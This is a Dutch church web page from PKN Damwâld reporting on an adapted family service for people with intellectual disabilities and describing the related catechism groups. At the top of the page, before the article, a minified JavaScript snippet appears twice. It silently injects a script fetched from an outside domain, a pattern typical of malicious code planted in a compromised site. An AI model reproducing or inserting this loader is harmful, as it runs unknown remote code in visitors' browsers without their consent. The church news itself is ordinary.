;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Laagdrempelige aangepaste gezinsdienst in volle kerk - PKN Damwâld

Laagdrempelige aangepaste gezinsdienst in volle kerk

Gepubliceerd op: woensdag 22 maart

Op zondag 19 maart was er na drie jaar weer een aangepaste gezinsdienst. De dienst werd gehouden in de Doopsgezinde kerk aan de Doniawei in Damwâld. Aanwezig waren de catechisanten van het Thomashuis, van de Klimmer en van de groep, die hun catechisatie heeft in ’t Honk. Alle Flootman noemde in zijn welkomstwoord de namen van alle catechisanten. Daarna begon de dienst met het lied “ Dit is in moarn tiid as oait de eerste “. Minke stak de kaars aan. Voor de overdenking zongen we “Sit net yn noed “  (Maak je geen zorgen ). Dominee Roelof Akse had voor de overdenking iemand uitgenodigd van de KIN. Dit betekent Kerkelijke Inspectie Nederland. Dominee speelde deze rol voortreffelijk. De catechisanten hielpen hem met het inspectierapport. Uiteindelijk was het veilig in de kerk en we behoefden ons geen zorgen te maken. Na de overdenking speelde Jitske Prins van het Thomashuis een lied op de accordeon “Vrij zijn als een vogel”. Jitske kreeg een daverend applaus. De dienst werd afgesloten met het lied “De God fan leafde”, dat geschreven is door R.H. Postma. Na de dienst koffie met een half stukje gebak vanwege de grote opkomst. En alle bezoekers kregen een narcis mee.

Geregeld wordt in een aantal kerken in Damwâld en omgeving een aangepaste gezinsdienst gehouden die met name gericht is op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die is vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijke taal en zijn ook uitermate geschikt voor kinderen. Ook is er al meerdere jaren een gespreksgroep en zijn er catechisaties voor mensen met een verstandelijke beperking. Deze bijeenkomsten, die gedurende het winterseizoen één keer per 14 dagen worden gehouden, duren ongeveer een half uur en worden o.a. gehouden in ‘De Ontmoeting’, in ‘De Klimmer’ aan de Thiedemawei, in Talant aan de Badhúswei /Nijewei en/of in het Thomashûs aan de Doniawei. Ieder mens is door God geroepen, heeft een naam. Ieder mens is uniek, met zijn of haar mogelijkheden en beperkingen. Door deze gave van verscheidenheid wordt de Christelijke gemeenschap ervaren en verrijkt.  Meer info? Sjoerd en Mattie van der Werf, 0511-424146.